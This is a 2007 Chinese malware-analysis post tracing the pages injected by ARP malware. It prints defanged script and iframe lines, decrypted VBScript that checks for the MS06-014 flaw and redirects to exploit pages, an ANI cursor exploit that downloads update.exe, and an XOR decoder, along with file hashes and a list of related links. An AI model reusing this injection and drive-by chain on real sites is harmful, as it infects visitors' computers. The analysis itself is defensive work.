endurer 原创
2007-05-24 第1版
ARP病毒自动加入的网址为:
/---
<script language=javascript src=hxxp://google**.17***173**8.org/ad***.js></script>
---/
ad***.js 包含代码:
/---
document.write('<iframe width=0 height=0 src="hxxp://google**.17***173**8.org/p*d***.htm"></iframe>');
---/
p*d***.htm 首先引入文件jscode.js,其内容是使用eval()执行自定义函数,从而产生自定义函数utf8to16()、xxtea_decrypt()、base64DecodeChars(),用于解密并输出变量t的值。
t 的值解密后为VBScript脚本:
/---
<script language=VBScript>
on error resume next
Set downf = document.createElement("object")
downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"
str="Microsoft.XMLHTTP"
Set O = downf.CreateObject(str,"")
if Not Err.Number = 0 then
err.clear
'msgbox "没有0614漏洞,页面转到ms07004EXP!"
document.write("<iframe width=""0"" height=""0"" src=""ms07017.htm""></iframe>")
else
'msgbox "存在0614漏洞,页面转到MS0614的EXP!"
document.write("<iframe width=""0"" height=""0"" src=""06014.htm""></iframe>")
end if
</script>
---/
ms07017.htm 与 p*d***.htm 相似,首先引入文件jscode.js,其内容是使用eval()执行自定义函数,从而产生自定义函数utf8to16()、xxtea_decrypt()、base64DecodeChars(),用于解密并输出变量t的值。
解密后的t值为JavaScript脚本,功能是如果cookie变量“MTV”不存在,则创建,并输出sscape()编码的代码:
/---
<script src="ani.js"></script>
---/
ani.js的内容为JavaScript脚本,包含代码:
/---
document.writeln(“<DIV style=/“CURSOR: url(hxxp:////google**.17***173**8.org//ani.jpg)/”><//DIV><//DIV><//BODY><//HTML>”);
---/
ani.jpg利用 ANI漏洞下载 update.exe
文件说明符 : D:/test/update.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-23 12:13:25
修改时间 : 2007-5-23 12:13:26
访问时间 : 2007-5-23 0:0:0
大小 : 36435 字节 35.595 KB
MD5 : e32966b40d3e655f1912b2cd6930b24b
Kaspersky 报为 Worm.Win32.Delf.cc,瑞星报为 Trojan.Mnless.lxp
06014.htm包含javascript代码,功能是使用自定义函数utf8to16()、xxtea_decrypt()、base64DecodeChars(),用于解密并输出变量t的值。
t 的值解密后为VBScript脚本,功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载rss.dll,保存为%windir%/WinHttp.dll,下载update.exe,保存为%windir%/KB726255.log,
创建WScript.Shell,在注册表HKLM/SOFTWARE/Classes/CLSID/{36CD708B-6077-4C02-9377-D73EAA495A0F}下创建键HTTP Execute Hooks和一些值。
其中部分代码需要使用自定义函数
/---
Function NC(x)
For i=1 to Len(x) Step 2
NC=NC & Chr(CLng("&H" & Mid(x,i,2)) Xor 23)
Next
End Function
---/
来解密。
文件说明符 : D:/test/rss.dll
属性 : A---
语言 : 中文(中国)
文件版本 : 6.00
说明 : Windows HTTPMon Dll
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : WINHTTP
源文件名 : WINHTTP.DLL
创建时间 : 2007-5-24 13:57:51
修改时间 : 2007-5-24 13:57:54
访问时间 : 2007-5-24 0:0:0
大小 : 5120 字节 5.0 KB
MD5 : 5164bccd2a40d9ac9bf83453c171c720
分享到:
相关推荐
手动移除方法 如果您的电脑没有最新的杀毒软件,或没有防病毒解决方案,您可以使用一个特殊的删除工具,它可以在这里找到support.kaspersky.com或按照以下步骤操作: ...更新您的防病毒数据库和执行完整扫描计算机
Net-Worm.Win32.Kido 专杀
病毒Net-Worm.Win32.Kido.ih 清除方法
也被称为W32/Worm.AHGV , Win32.Worm.Downadup ,净Worm.Win32.Kido.bg ,蠕虫: Win32/Conficker , W32/Conficker.worm.gen ,并末/ Conficker ,是一种恶意蠕虫病毒传播的电脑在当地的网络,利用微软Windows ...
delphi Email-Worm.Win32.Canbis
Worm.WhBoy
微软网站上不去 说明中毒了,可以用此工具杀一下
Worm.Win32.Relop I-Worm.Lentin.a,b,c,d,e,f,g I-Worm.Tanatos Worm.Win32.Opasoft.a,b,c,d I-Worm.Klez.a,e,f,g,h Win32.Elkern.c 程序先扫描内存,然后再扫描指定的路径。 若发现内存或...
engine-worm.c
著名的bat.worm.muma,保存为txt格式
微软推出的有关冲击波(Worm.Msblast)病毒的安全补丁程序,适用于WindowsXP。
zoj 2499 The Happy Worm.md
Worm.Nimaya(熊猫烧香) 专杀工具最新版本:1.10
3.2.1 示例一:Worm.Msblast 17 3.2.2 示例二:Worm.Sasser 18 3.2.3 示例三:Worm.SQLexp.376 19 3.2.4 示例四:Worm_Bagle.BE 20 3.2.5 示例五:Worm.MyDoom 21 3.2.6 示例六:Code Red & Code Red II 23 ...
win32.lovegate/i,win32.supnot.ay/ax/ah,i-worm.supnot众多变种 win32.parite.a 病毒,运行时,病毒会附加在Explorer.exe文件上以便驻留内存。 病毒会感染本地及其它可以访问的网络驱动器上的*.EXE和*.SCR...
morris worm source code
sql编程开发的worm蠕虫经典代码sql programming code developed by the classic worm worm
通过对 “冰河”、 “蓝色火焰”、 “BO”、 “广外女生”、 “黑洞”、 “网结”病毒(Worm.Plexus.b)、 “将死者”病毒(Worm.Gone.38912)、 “恶鹰”病毒(Worm.Beagle)、 “网络天空”病毒(Worm.NetSky)、传奇叛逆...
网络-计算机-安全相关
网络-计算机-安全相关